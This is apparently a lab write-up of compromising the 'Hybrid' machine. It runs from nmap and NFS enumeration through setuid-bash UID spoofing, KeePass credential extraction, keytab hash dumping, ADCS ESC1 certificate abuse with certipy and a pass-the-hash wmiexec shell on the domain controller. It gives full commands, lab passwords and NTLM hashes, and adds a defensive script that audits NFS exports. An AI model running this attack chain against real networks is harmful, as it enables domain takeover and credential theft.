nmap -p- -A --open -T5 -Pn -n -oN ext_hybrid_tcp_allports -vvv --min-rate 3000 10.10.141.149-150
#10.10.141.149
53/tcp open tcpwrapped syn-ack
135/tcp open tcpwrapped syn-ack
139/tcp open tcpwrapped syn-ack
445/tcp open tcpwrapped syn-ack
3389/tcp open tcpwrapped syn-ack
9389/tcp open tcpwrapped syn-ack
49667/tcp open tcpwrapped syn-ack
49670/tcp open tcpwrapped syn-ack
#10.10.141.150
22/tcp open tcpwrapped syn-ack
25/tcp open tcpwrapped syn-ack
80/tcp open tcpwrapped syn-ack
110/tcp open tcpwrapped syn-ack
111/tcp open tcpwrapped syn-ack
143/tcp open tcpwrapped syn-ack
993/tcp open tcpwrapped syn-ack
995/tcp open tcpwrapped syn-ack
2049/tcp open nfs
35407/tcp open tcpwrapped syn-ack
Initial Enumeration
Enumerating the network file system
showmount -e 10.10.141.150
Export list for 10.10.141.150:
/opt/share *
Mounting the network file system
mkdir share
sudo mount -t nfs 10.10.141.150:/opt/share share -o nolock
cp share/backup.tar.gz .
tar -xvf backup.tar.gz
Roundcube 1.6.1 and prior have a vulnerability in the markasjunk plugin: an attacker who sets a specially crafted identity email address can make the plugin execute arbitrary code.
Exploitation
Modifying the user's email field to abuse the RCE.
To escalate privileges, the tester leveraged an NFS share misconfiguration that allowed file manipulation using the www-data account. The exploitation flow was as follows:
UID Spoofing:
On the tester's machine, a local user was created with the same UID as the target user peter.turner@hybrid.vl (UID: 902601108) to impersonate them over the NFS share:
Abusing NFS Share with www-data:
The compromised www-data account had write access to a shared NFS directory. A custom Bash binary was placed into the NFS share from this account.
Setting the SetUID Bit (on Attacker's Machine):
From the attacker-controlled machine (where the spoofed user existed), the tester moved the Bash binary to a temporary directory (e.g., /tmp), modified its permissions to include the setuid bit, and moved it back into the NFS directory:
chmod u+s bash
mv bash /path/to/nfs/share/
Privilege Escalation:
Back on the target machine, the www-data account executed the Bash binary with elevated privileges using the -p flag:
./bash -p
This resulted in a shell running with the effective UID of peter.turner@hybrid.vl, completing the privilege escalation to that user.
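The escalation above works because the export honours whatever UID a client claims and keeps the setuid bit on files written through it. The following script is an added example (not part of the original write-up) that audits an /etc/exports file for exactly those settings and rebuilds a hardened line; the export entries in SAMPLE_EXPORTS are constructed samples, not the target's real configuration, and the option names assume the Linux nfsd exports syntax.

```python
"""Audit /etc/exports for the settings that let a client-chosen UID and a
setuid binary cross an NFS share.  Added example, not part of the original
write-up; the export lines below are constructed samples."""
import re

# Constructed sample exports file (assumption: Linux nfsd /etc/exports syntax).
SAMPLE_EXPORTS = """\
# exports file
/opt/share   *(rw,sync,no_subtree_check,no_root_squash)
/srv/backup  10.10.141.0/24(rw,sync,root_squash)
/srv/ro      10.10.141.0/24(ro,sync,all_squash,anonuid=65534,anongid=65534)
"""

# one client spec: host/network followed by an optional parenthesised option list
CLIENT_RE = re.compile(r'([^\s(]+)(?:\((.*?)\))?')


def parse_exports(text):
    """Return (path, client, options) for every client of every export line.

    Options are kept as an ordered list so a hardened line can be rebuilt
    in the order the administrator wrote it."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients:
            m = CLIENT_RE.fullmatch(spec)
            if m is None:
                raise ValueError(f'cannot parse client spec {spec!r}')
            opts = [o.strip() for o in (m.group(2) or '').split(',') if o.strip()]
            entries.append((path, m.group(1), opts))
    return entries


def lint_export(path, client, opts):
    """Return the findings for one (path, client) pair; [] means nothing to fix."""
    findings = []
    if client in ('*', '0.0.0.0/0'):
        findings.append('wildcard-client')          # any host can mount it
    if 'no_root_squash' in opts:
        findings.append('no_root_squash')           # client root == server root
    if 'rw' in opts and 'all_squash' not in opts:
        # Writers keep whatever UID they claim, so a file owned by a spoofed
        # UID, with a setuid bit set on the client, is honoured on the server.
        findings.append('rw-without-all_squash')
    return findings


def audit(text):
    """Map (path, client) -> findings for a whole exports file."""
    return {(p, c): lint_export(p, c, o) for p, c, o in parse_exports(text)}


def hardened_line(path, client, opts):
    """Rebuild the export with root_squash and all_squash enforced.

    The client list is left as-is: replacing '*' with the real client hosts
    is a decision only the administrator can make."""
    kept = [o for o in opts if o != 'no_root_squash']
    for required in ('root_squash', 'all_squash'):
        if required not in kept:
            kept.append(required)
    return f'{path} {client}({",".join(kept)})'


if __name__ == '__main__':
    for (path, client), findings in audit(SAMPLE_EXPORTS).items():
        print(f'{path} {client}: {", ".join(findings) if findings else "ok"}')
        if findings:
            opts = next(o for p, c, o in parse_exports(SAMPLE_EXPORTS)
                        if (p, c) == (path, client))
            print('  suggested:', hardened_line(path, client, opts))
```

all_squash maps every NFS writer to the anonymous UID, so a binary placed through the share can never be setuid to a real account; keeping the filesystem that backs the export mounted nosuid on the server closes the setuid path for files that arrive by any other route.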
Privilege Escalation to root on mail01
Finding a Keepass database
Inside peter.turner@hybrid.vl's home directory there was a KeePass database file. I moved it to my machine and, thanks to credential reuse, extracted the credentials.
❯ kpcli --kdb=passwords.kdbx
Provide the master password: *************************
kpcli:/> cd hybrid.vl
kpcli:/hybrid.vl> ls
=== Entries ===
0. domain
1. mail mail01.hybrid.vl
kpcli:/hybrid.vl> show 0
Title: domain
Uname: peter.turner
Pass: b0cwR+G4Dzl_rw
URL:
Notes:
Abusing the sudoers configuration
peter.turner@hybrid.vl@mail01:~$ sudo -l
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User peter.turner@hybrid.vl may run the following commands on mail01:
(ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl#
Compromising Domain controller
Discovering that a template enrollable by Domain Computers is vulnerable to ESC1
❯ certipy-ad find -u peter.turner -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.219.181 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : hybrid-DC01-CA
DNS Name : dc01.hybrid.vl
Certificate Subject : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
Certificate Serial Number : 7D22C8F2760BC48A4E57B5E94984304B
Certificate Validity Start : 2023-06-17 14:04:39+00:00
Certificate Validity End : 2125-04-03 23:35:28+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : HYBRID.VL\Administrators
Access Rights
ManageCertificates : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
ManageCa : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
Enroll : HYBRID.VL\Authenticated Users
Certificate Templates
0
Template Name : HybridComputers
Display Name : HybridComputers
Certificate Authorities : hybrid-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : HYBRID.VL\Domain Admins
HYBRID.VL\Domain Computers
HYBRID.VL\Enterprise Admins
Object Control Permissions
Owner : HYBRID.VL\Administrator
Write Owner Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Dacl Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Property Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
[!] Vulnerabilities
ESC1 : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
Extracting the compromised computer account's NT hash to abuse ESC1
python3 keytabextract.py /home/Intrusionz3r0/Documents/Hybrid/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458
Abusing ESC1 to compromise the domain controller.
❯ certipy-ad req -u 'MAIL01$' -hashes :0f916c5246fdbc7ba95dcef4126d57bd -dc-ip 10.10.219.181 -ca hybrid-DC01-CA -template HybridComputers -upn Administrator -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
❯ certipy-ad auth -username Administrator -dc-ip 10.10.219.181 -pfx administrator.pfx -domain hybrid.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:60701e8543c9f6db1a2af3217386d3dc
Obtaining a shell as Administrator on DC01
❯ impacket-wmiexec hybrid.vl/Administrator@10.10.219.181 -hashes :60701e8543c9f6db1a2af3217386d3dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
hybrid\administrator
C:\>hostname
dc01
C:\>